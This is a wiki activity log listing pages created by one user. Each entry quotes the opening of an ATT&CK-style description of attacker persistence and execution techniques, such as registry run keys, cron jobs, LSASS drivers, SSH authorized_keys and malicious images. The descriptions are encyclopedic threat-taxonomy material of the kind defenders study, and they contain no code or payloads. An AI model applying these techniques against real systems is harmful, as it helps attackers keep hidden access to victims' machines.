All public logs

Combined display of all available logs of RCATs. You can narrow down the view by selecting a log type, the username (case-sensitive), or the affected page (also case-sensitive).

Logs
(newest | oldest) View ( | ) (20 | 50 | 100 | 250 | 500)
  • 16:58, 26 January 2023 Ali3nw3rx talk contribs created page Compromise Client Software Binary (Created page with "Adversaries may modify client software binaries to establish persistent access to systems. Client software enables users to access services provided by a server. Common client software types are SSH clients, FTP clients, email clients, and web browsers. Adversaries may make modifications to client software binaries to carry out malicious tasks when those applications are in use. For example, an adversary may copy source code for the client software, add a backdoor, comp...")
  • 16:58, 26 January 2023 Ali3nw3rx talk contribs created page Browser Extensions (Created page with "Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.[1][2] Malicious extensions can be installed into a browser through malicious app store downloads masquera...")
  • 16:57, 26 January 2023 Ali3nw3rx talk contribs created page Startup Items (Created page with "Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.[1] This is technically a deprecated technology (superseded by Launch Daemon), and thus the appropriate folder, /Library/StartupItems isn’...")
  • 16:56, 26 January 2023 Ali3nw3rx talk contribs created page RC Scripts (Created page with "Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify. Adversaries can establish persistence by adding a malicious binary path or shell commands to rc.local, rc.common, and other RC scripts specific to the Unix-like distribution.[1][2] Upon reboot, the...")
  • 16:56, 26 January 2023 Ali3nw3rx talk contribs created page Network Logon Script (Created page with "Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects.[1] These logon scripts run with the privileges of the user they are assigned to. Depending on the systems within the network, initializing one of these scripts could apply to more than one or potentially all systems. Adversaries may use these scripts to maintain persistenc...")
  • 16:55, 26 January 2023 Ali3nw3rx talk contribs created page Login Hook (Created page with "Adversaries may use a Login Hook to establish persistence executed upon user logon. A login hook is a plist file that points to a specific script to execute with root privileges upon user logon. The plist file is located in the /Library/Preferences/com.apple.loginwindow.plist file and can be modified using the defaults command-line utility. This behavior is the same for logout hooks where a script can be executed upon user logout. All hooks require administrator permissi...")
  • 16:47, 26 January 2023 Ali3nw3rx talk contribs created page Logon Script (Windows) (Created page with "Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.[1] This is done via adding a path to a script to the HKCU\Environment\UserInitMprLogonScript Registry key.[2] Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either loc...")
  • 16:46, 26 January 2023 Ali3nw3rx talk contribs created page Category:Boot or Logon Initialization Scripts (Created page with "Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely. Adversaries may use these scripts to maintain persistence on a single system. Depending on the access configurati...")
  • 16:45, 26 January 2023 Ali3nw3rx talk contribs created page Login Items (Created page with "Adversaries may add login items to execute upon user login to gain persistence or escalate privileges. Login items are applications, documents, folders, or server connections that are automatically launched when a user logs in.[1] Login items can be added via a shared file list or Service Management Framework.[2] Shared file list login items can be set using scripting languages such as AppleScript, whereas the Service Management Framework uses the API call SMLoginItemSet...")
  • 16:44, 26 January 2023 Ali3nw3rx talk contribs created page Active Setup (Created page with "Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine. Active Setup is a Windows mechanism that is used to execute programs when a user logs in. The value stored in the Registry key will be executed after a user logs into the computer.[1] These programs will be executed under the context of the user and will have the account's associated permissions level. Adversaries may abuse Active Setup by creating a key under HKLM\SOF...")
  • 16:43, 26 January 2023 Ali3nw3rx talk contribs created page XDG Autostart Entries (Created page with "Adversaries may modify XDG autostart entries to execute programs or commands during system boot. Linux desktop environments that are XDG compliant implement functionality for XDG autostart entries. These entries will allow an application to automatically start during the startup of a desktop environment after user logon. By default, XDG autostart entries are stored within the /etc/xdg/autostart or ~/.config/autostart directories and have a .desktop file extension.[1] Wi...")
  • 16:43, 26 January 2023 Ali3nw3rx talk contribs created page Print Processors (Created page with "Adversaries may abuse print processors to run malicious DLLs during system boot for persistence and/or privilege escalation. Print processors are DLLs that are loaded by the print spooler service, spoolsv.exe, during boot. Adversaries may abuse the print spooler service by adding print processors that load malicious DLLs at startup. A print processor can be installed through the AddPrintProcessor API call with an account that has SeLoadDriverPrivilege enabled. Alternati...")
  • 16:42, 26 January 2023 Ali3nw3rx talk contribs created page Port Monitors (Created page with "Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.[1] This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.[2] Alternatively, an arbitrary DLL can be loaded if permissions a...")
  • 16:41, 26 January 2023 Ali3nw3rx talk contribs created page Shortcut Modification (Created page with "Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process. Adversaries may abuse shortcuts in the startup folder to execute their tools and achieve persistence.[1] Although often used as payloads in an infection chain (e.g. Spearphishing Attachment), ad...")
  • 16:40, 26 January 2023 Ali3nw3rx talk contribs created page LSASS Driver (Created page with "Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of...")
  • 16:39, 26 January 2023 Ali3nw3rx talk contribs created page Re-opened Applications (Created page with "Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".[1] When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist within the ~/Library/Preferences/ByHost directory.[2][3] Applications listed in this fil...")
  • 16:38, 26 January 2023 Ali3nw3rx talk contribs created page Kernel Modules and Extensions (Created page with "Adversaries may modify the kernel to automatically execute programs on system boot. Loadable Kernel Modules (LKMs) are pieces of code that can be loaded and unloaded into the kernel upon demand. They extend the functionality of the kernel without the need to reboot the system. For example, one type of module is the device driver, which allows the kernel to access hardware connected to the system.[1] When used maliciously, LKMs can be a type of kernel-mode Rootkit that...")
  • 16:35, 26 January 2023 Ali3nw3rx talk contribs created page Security Support Provider (Created page with "Adversaries may abuse security support providers (SSPs) to execute DLLs when the system boots. Windows SSP DLLs are loaded into the Local Security Authority (LSA) process at system start. Once loaded into the LSA, SSP DLLs have access to encrypted and plaintext passwords that are stored in Windows, such as any logged-on user's Domain password or smart card PINs. The SSP configuration is stored in two Registry keys: HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Pack...")
  • 16:35, 26 January 2023 Ali3nw3rx talk contribs created page Winlogon Helper DLL (Created page with "Adversaries may abuse features of Winlogon to execute DLLs and/or executables when a user logs in. Winlogon.exe is a Windows component responsible for actions at logon/logoff as well as the secure attention sequence (SAS) triggered by Ctrl-Alt-Delete. Registry entries in HKLM\Software[\Wow6432Node\]\Microsoft\Windows NT\CurrentVersion\Winlogon\ and HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ are used to manage additional helper programs and functionalitie...")
  • 16:34, 26 January 2023 Ali3nw3rx talk contribs created page Time Providers (Created page with "Adversaries may abuse time providers to execute DLLs when the system boots. The Windows Time service (W32Time) enables time synchronization across and within domains.[1] W32Time time providers are responsible for retrieving time stamps from hardware/network resources and outputting these values to other network clients.[2] Time providers are implemented as dynamic-link libraries (DLLs) that are registered in the subkeys of HKEY_LOCAL_MACHINE\System\CurrentControlSet\Ser...")
  • 16:28, 26 January 2023 Ali3nw3rx talk contribs created page Authentication Package (Created page with "Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.[1] Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location H...")
  • 16:27, 26 January 2023 Ali3nw3rx talk contribs created page Registry Run Keys / Startup Folder (Created page with "Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.[1] These programs will be executed under the context of the user and will have the account's associated permissions level. Placing a program within a startup folder will also cause that program to execute when a user...")
  • 16:26, 26 January 2023 Ali3nw3rx talk contribs created page Category:Boot or Logon Autostart Execution (Created page with "Adversaries may configure system settings to automatically execute a program during system boot or logon to maintain persistence or gain higher-level privileges on compromised systems. Operating systems may have mechanisms for automatically running a program on system boot or account logon.[1][2][3][4][5] These mechanisms may include automatically executing programs that are placed in specially designated directories or are referenced by repositories that store configura...")
  • 16:25, 26 January 2023 Ali3nw3rx talk contribs created page BITS Jobs (Created page with "Adversaries may abuse BITS jobs to persistently execute code and perform various background tasks. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth, asynchronous file transfer mechanism exposed through Component Object Model (COM).[1][2] BITS is commonly used by updaters, messengers, and other applications preferred to operate in the background (using available idle bandwidth) without interrupting other networked applications. File transfer tasks...")
  • 16:25, 26 January 2023 Ali3nw3rx talk contribs created page Device Registration (Created page with "Adversaries may register a device to an adversary-controlled account. Devices may be registered in a multifactor authentication (MFA) system, which handles authentication to the network, or in a device management system, which handles device access and compliance. MFA systems, such as Duo or Okta, allow users to associate devices with their accounts in order to complete MFA requirements. An adversary that compromises a user’s credentials may enroll a new device in ord...")
  • 16:24, 26 January 2023 Ali3nw3rx talk contribs created page SSH Authorized Keys (Created page with "Adversaries may modify the SSH authorized_keys file to maintain persistence on a victim host. Linux distributions and macOS commonly use key-based authentication to secure the authentication process of SSH sessions for remote management. The authorized_keys file in SSH specifies the SSH keys that can be used for logging into the user account for which the file is configured. This file is usually found in the user's home directory under <user-home>/.ssh/authorized_keys.[1...")
  • 16:23, 26 January 2023 Ali3nw3rx talk contribs created page Additional Cloud Roles (Created page with "An adversary may add additional roles or permissions to an adversary-controlled cloud account to maintain persistent access to a tenant. For example, adversaries may update IAM policies in cloud-based environments or add a new global administrator in Office 365 environments.[1][2][3][4] With sufficient permissions, a compromised account can gain almost unlimited access to data and settings (including the ability to reset the passwords of other admins).[5][4] This accoun...")
  • 16:23, 26 January 2023 Ali3nw3rx talk contribs created page Additional Email Delegate Permissions (Created page with "Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account. For example, the Add-MailboxPermission PowerShell cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.[1][2][3] In Google Workspace, delegation can be enabled via the Google Admin console and users can delegate accounts via their Gmail settings.[4][5] Adversaries may also assign mailbox...")
  • 16:22, 26 January 2023 Ali3nw3rx talk contribs created page Additional Cloud Credentials (Created page with "Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment. For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.[1][2][3] These credentials include both x509 keys and passwords.[1] With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal...")
  • 16:21, 26 January 2023 Ali3nw3rx talk contribs created page Category:Account Manipulation (Created page with "Adversaries may manipulate accounts to maintain access to victim systems. Account manipulation may consist of any action that preserves adversary access to a compromised account, such as modifying credentials or permission groups. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to bypass password duration policies and preserve the life of compromised credentials. In order to create or...")
  • 16:20, 26 January 2023 Ali3nw3rx talk contribs created page Category:Persistence (Created page with "The adversary is trying to maintain their foothold. Persistence consists of techniques that adversaries use to keep access to systems across restarts, changed credentials, and other interruptions that could cut off their access. Techniques used for persistence include any access, action, or configuration changes that let them maintain their foothold on systems, such as replacing or hijacking legitimate code or adding startup code.")
  • 16:14, 26 January 2023 Ali3nw3rx talk contribs protected Category:Execution [Edit=Allow only administrators] (indefinite) [Move=Allow only administrators] (indefinite) (hist)
  • 16:13, 26 January 2023 Ali3nw3rx talk contribs created page Windows Management Instrumentation (Created page with "Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).[1] Remote WMI over DCOM operates using port 135, whereas WMI over W...")
  • 16:13, 26 January 2023 Ali3nw3rx talk contribs created page Malicious Image (Created page with "Adversaries may rely on a user running a malicious image to facilitate execution. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be backdoored. Backdoored images may be uploaded to a public repository via Upload Malware, and users may then download and deploy an instance or container from the image without realizing the image is malicious, thus bypassing...")
  • 16:12, 26 January 2023 Ali3nw3rx talk contribs created page Malicious File (Created page with "An adversary may rely upon a user opening a malicious file in order to gain execution. Users may be subjected to social engineering to get them to open a file that will lead to code execution. This user action will typically be observed as follow-on behavior from Spearphishing Attachment. Adversaries may use several types of files that require a user to execute them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl. Adversaries may employ various forms...")
  • 16:11, 26 January 2023 Ali3nw3rx talk contribs created page Malicious Link (Created page with "An adversary may rely upon a user clicking a malicious link in order to gain execution. Users may be subjected to social engineering to get them to click on a link that will lead to code execution. This user action will typically be observed as follow-on behavior from Spearphishing Link. Clicking on a link may also lead to other execution techniques such as exploitation of a browser or application vulnerability via Exploitation for Client Execution. Links may also lead u...")
  • 16:11, 26 January 2023 Ali3nw3rx talk contribs created page Category:User Execution (Created page with "An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of Phishing. While User Execution frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in...")
  • 16:10, 26 January 2023 Ali3nw3rx talk contribs created page Service Execution (Created page with "Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager (services.exe) is an interface to manage and manipulate services.[1] The service control manager is accessible to users via GUI components as well as system utilities such as sc.exe and Net. PsExec can also be used to execute commands or payloads via a temporary Windows service created through the service control manager API.[2] Tools...")
  • 16:09, 26 January 2023 Ali3nw3rx talk contribs created page Launchctl (Created page with "Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.[1] Adversaries use launchctl to execute commands and programs as Launch Agents or Launch Daemons. Common subcommands include: launchctl load,launchctl unload, and launchctl start. Adversaries can use scripts or manua...")
  • 16:09, 26 January 2023 Ali3nw3rx talk contribs created page Category:System Services (Created page with "Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence (Create or Modify System Process), but adversaries can also abuse services for one-time or temporary execution. category: execution")
  • 16:08, 26 January 2023 Ali3nw3rx talk contribs deleted page System Services (content was: "Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence (Create or Modify System Process), but adversaries can also abuse services for one-time or temporary ex...", and the only contributor was "Ali3nw3rx" (talk))
  • 16:08, 26 January 2023 Ali3nw3rx talk contribs created page System Services (Created page with "Adversaries may abuse system services or daemons to execute commands or programs. Adversaries can execute malicious content by interacting with or creating services either locally or remotely. Many services are set to run at boot, which can aid in achieving persistence (Create or Modify System Process), but adversaries can also abuse services for one-time or temporary execution. category: execution")
  • 16:07, 26 January 2023 Ali3nw3rx talk contribs created page Software Deployment Tools (Created page with "Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, HBSS, Altiris, etc.). Access to a third-party network-wide or enterprise-wide software system may enable an adversary to have rem...")
  • 16:06, 26 January 2023 Ali3nw3rx talk contribs created page Shared Modules (Created page with "Adversaries may execute malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like CreateProcess, LoadLibrary, etc. of the Win32 API.[1] The module loader can load DLLs: via specification of the (fully-qualified or relative)...")
  • 16:06, 26 January 2023 Ali3nw3rx talk contribs created page Serverless Execution (Created page with "Adversaries may abuse serverless computing, integration, and automation services to execute arbitrary code in cloud environments. Many cloud providers offer a variety of serverless resources, including compute engines, application integration services, and web servers. Adversaries may abuse these resources in various ways as a means of executing arbitrary commands. For example, adversaries may use serverless functions to execute malicious code, such as crypto-mining mal...")
  • 16:05, 26 January 2023 Ali3nw3rx talk contribs created page Container Orchestration Job (Created page with "Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster....")
  • 16:05, 26 January 2023 Ali3nw3rx talk contribs created page Systemd Timers (Created page with "Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to Cron in Linux environments.[1] Systemd timers may be activated remotely via the systemctl command line utility, which operates over SSH.[2] Ea...")
  • 16:04, 26 January 2023 Ali3nw3rx talk contribs created page Scheduled Task (Created page with "Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The schtasks utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, ad...")
  • 16:03, 26 January 2023 Ali3nw3rx talk contribs created page Cron (Created page with "Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of malicious code.[1] The cron utility is a time-based job scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run and the specified times for execution. Any crontab files are stored in operating system-specific file paths. An adversary may use cron in Linux or Unix environments to execute programs at system startup or...")
  • 16:03, 26 January 2023 Ali3nw3rx talk contribs created page At (Created page with "Adversaries may abuse the at utility to perform task scheduling for initial or recurring execution of malicious code. The at utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of Scheduled Task's schtasks in Windows environments, using at requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. On Linux and...")
(newest | oldest) View ( | ) (20 | 50 | 100 | 250 | 500)
Retrieved from "https://rcats.dev/rcats/index.php/Special:Log/Ali3nw3rx"